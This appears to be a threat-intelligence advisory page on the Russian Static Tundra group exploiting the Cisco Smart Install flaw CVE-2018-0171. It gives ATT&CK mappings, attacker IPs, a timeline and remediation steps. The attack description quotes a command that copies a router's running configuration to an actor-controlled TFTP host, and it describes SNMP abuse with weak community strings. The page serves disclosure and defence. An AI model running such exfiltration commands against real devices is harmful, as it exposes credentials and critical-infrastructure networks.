Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco Smart Install Flaw Against Critical Infrastructure

Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco (TL-2026-1282), also tracked as Static Tundra Cisco Smart Install Campaign, is a critical-severity software vulnerability scored CVSS 9.8, first published 2026-07-13. It is attributed to Static Tundra (Russia) with high confidence, affects Cisco IOS Software, references 1 CVE (CVE-2018-0171), maps to 27 MITRE ATT&CK techniques (T1016, T1040, T1041), and is covered by 9 detection rules and 22 indicators of compromise.

Key facts for TL-2026-1282

Threat ID
TL-2026-1282
Also known as
Static Tundra Cisco Smart Install Campaign
Severity
CRITICAL
CVSS
9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Status
ACTIVE
Category
VULNERABILITY
First published
2026-07-13
Last reviewed
2026-07-13
Attribution
Static Tundra
Attribution confidence
HIGH
Nation-state nexus
Russia
Motivation
ESPIONAGE
Target sectors
energy, communications, telecoms, defense industrial base, health, financial services, government administration, higher education, manufacturing
Target regions
North America, Europe, Asia, Africa, ukraine
Detection rules
9
Indicators of compromise
22

Malware and tooling in Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco

Malware and tooling: SYNful Knock - S0519, CISCO-CONFIG-COPY-MIB abuse

NSA, FBI, and CISA, joined by 15 allied agencies across nine countries, issued a joint advisory on Static Tundra (aka Berserk Bear, Energetic Bear, Crouching Yeti, Dragonfly, Ghost Blizzard), a Russian FSB Center 16-linked espionage group aggressively exploiting CVE-2018-0171 in Cisco IOS/IOS XE Smart Install since November 2021, combined with weak/default SNMP community strings, to compromise routers, deploy firmware implants, and exfiltrate device configurations from critical infrastructure.

How Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco works

Static Tundra is a Russian state-sponsored cyber-espionage group, assessed by Cisco Talos to be linked to the FSB's Center 16 unit and likely a sub-cluster of the longer-running Energetic Bear (Berserk Bear/Dragonfly) activity cluster, with operations tracing back over a decade to at least 2015. The group's hallmark tradecraft is network-device-centric espionage: rather than deploying conventional endpoint malware, Static Tundra targets routers and switches directly, favoring unpatched, end-of-life Cisco IOS and IOS XE devices.

The group's primary current initial-access vector is CVE-2018-0171, a critical (CVSS 9.8) unauthenticated remote code execution / denial-of-service vulnerability in the Cisco Smart Install feature. Despite being patched by Cisco in 2018, Static Tundra has aggressively and continuously exploited unpatched instances since at least November 2021, sending crafted Smart Install messages to TCP port 4786 to trigger a stack/buffer overflow that grants administrative control of the device. In parallel, the group scans for and abuses devices still configured with default or weak SNMP community strings (e.g., "public", "anonymous"), issuing SNMP commands — sometimes with spoofed source IP addresses to bypass access control lists — to read and rewrite device configuration.

Once administrative access is obtained, Static Tundra exfiltrates the full running/startup configuration via TFTP or FTP (commands such as `copy running-config tftp://<actor_ip>/config.txt` or via the CISCO-CONFIG-COPY-MIB SNMP object), harvesting Type 7 (Vigenere-cipher, trivially reversible) passwords, plaintext credentials, SNMP community strings, and TACACS+ secrets embedded in the config. The group then re-uses these harvested credentials to pivot deeper, create new privileged (privilege level 15) local accounts, enable TELNET where disabled, modify TACACS+ configuration to degrade centralized logging, adjust ACLs to permit continued actor access, and in some cases establish GRE tunnels to redirect and collect NetFlow/traffic data. For long-term persistence on more capable platforms, Talos assesses with moderate confidence that Static Tundra is associated with the historic SYNful Knock firmware implant — a modular backdoor injected directly into the Cisco IOS image that survives reboots and is remotely activated via a crafted TCP SYN "magic packet."

Victimology spans telecommunications, higher education, and manufacturing globally (North America, Asia, Africa, Europe), with a documented escalation in targeting of Ukraine and allied nations following Russia's 2022 full-scale invasion. The July 2026 joint advisory broadens the disclosed target set to energy, defense industrial base, healthcare, financial services, and state/local government sectors, reflecting continued FSB strategic-intelligence and pre-positioning objectives against Western critical infrastructure. The nine-country coalition advisory (US, Australia, UK, Canada, New Zealand, Estonia, Finland, France, Italy) underscores the scale and persistence of the campaign and urges immediate disabling of Smart Install, migration to SNMPv3, and replacement of end-of-life hardware.

MITRE ATT&CK techniques used in TL-2026-1282

Discovery

T1016 System Network Configuration Discovery; T1046 Network Service Discovery; T1087 Account Discovery

Credential Access

T1040 Network Sniffing; T1110 Brute Force; T1552 Unsecured Credentials

Exfiltration

T1041 Exfiltration Over C2 Channel; T1048 Exfiltration Over Alternative Protocol

Execution

T1059 Command and Scripting Interpreter

Defense Evasion

T1070 Indicator Removal

Initial Access

T1078 Valid Accounts; T1133 External Remote Services; T1190 Exploit Public-Facing Application

Privilege Escalation

T1078 Valid Accounts

Command and Control

T1090 Proxy; T1095 Non-Application Layer Protocol

Persistence

T1098 Account Manipulation; T1136 Create Account

Collection

T1119 Automated Collection; T1557 Adversary-in-the-Middle; T1602 Data from Configuration Repository

Lateral Movement

T1210 Exploitation of Remote Services

Impact

T1499 Endpoint Denial of Service

resource-development

T1584 Compromise Infrastructure

Reconnaissance

T1590 Gather Victim Network Information; T1595 Active Scanning

defense-impairment

T1601 Modify System Image; T1685 Disable or Modify Tools

Affected products and versions in Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco

  • Cisco — IOS Software
    Vulnerable versions: Smart Install-enabled releases prior to fix; 15.2(5)e
    Fixed in: Per cisco-sa-20180328-smi2 fixed release table
  • Cisco — IOS XE Software
    Vulnerable versions: Smart Install-enabled releases prior to fix
    Fixed in: Per cisco-sa-20180328-smi2 fixed release table

Remediation for Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco

Patches

  • Cisco IOS/IOS XE fixed releases per cisco-sa-20180328-smi2 (patched 2018-03-28)

Immediate actions

  • Disable Cisco Smart Install globally with 'no vstack' on all IOS/IOS XE devices
  • Patch CVE-2018-0171 immediately per Cisco Security Advisory cisco-sa-20180328-smi2
  • Block TCP/4786 (Smart Install), TFTP, and SNMP at network perimeter and management-plane ACLs
  • Rotate all SNMP community strings; disable default/weak strings such as 'public' and 'anonymous'
  • Disable TELNET on VTY lines; enforce 'transport input ssh'

Workarounds

  • Disable Smart Install via 'no vstack' if immediate patching is infeasible
  • Use Type 8 password hashing for local accounts and Type 6 encryption for TACACS+ keys

Longer-term hardening

  • Migrate all SNMP to SNMPv3 with authPriv
  • Replace end-of-life Cisco networking hardware that cannot receive further security patches
  • Deploy centralized, integrity-verified configuration management; do not trust running device config as source of truth
  • Implement MFA and AAA controls for all device management access
  • Encrypt all management-plane traffic (SSH, HTTPS, NETCONF/RESTCONF, SNMPv3)
  • Continuously monitor TACACS+/RADIUS authentication logs for gaps or tampering

CVEs associated with Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco

CVE-2018-0171

Weaknesses (CWE) in Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco

CWE-787, CWE-20

Timeline of Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco

  • Static Tundra activity first observed by Cisco Talos; historically associated with the SYNful Knock Cisco IOS firmware implant, publicly reported in 2015.
  • Cisco discloses and patches CVE-2018-0171, a critical (CVSS 9.8) Smart Install unauthenticated RCE/DoS vulnerability, via advisory cisco-sa-20180328-smi2.
  • FBI/CISA assess Static Tundra began aggressive, sustained exploitation of the unpatched CVE-2018-0171 flaw against critical infrastructure network devices.
  • Following Russia's full-scale invasion of Ukraine, Static Tundra escalates targeting of Ukrainian and allied-nation network infrastructure.
  • Attacker infrastructure IP 185.141.24.222 observed active in Static Tundra operations per Talos telemetry.
  • Attacker infrastructure IPs 185.141.24.28 and 185.82.200.181 begin an active-use window through late 2024/mid-2025.
  • Attacker infrastructure IP 185.82.202.34 active through late February 2025.
  • Last observed activity window for attacker infrastructure IP 185.141.24.28, per Talos IOC telemetry.
  • Cisco Talos, FBI, and CISA jointly publish detailed technical analysis and IC3 PSA (PSA250820) on Static Tundra's Cisco Smart Install and SNMP exploitation campaign.
  • NSA, FBI, and CISA, joined by 15 agencies across Australia, UK, Canada, New Zealand, Estonia, Finland, France, and Italy, publish a renewed joint advisory on Static Tundra targeting critical infrastructure network devices with CVE-2018-0171 and weak SNMP authentication.

Sources cited for Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco

Threats related to Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco

Detection coverage for TL-2026-1282

As of 2026-07-13, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1282 across Splunk SPL, Microsoft KQL and Sigma, covering 22 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

Community OSINT corroboration for TL-2026-1282

1 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Latest Threats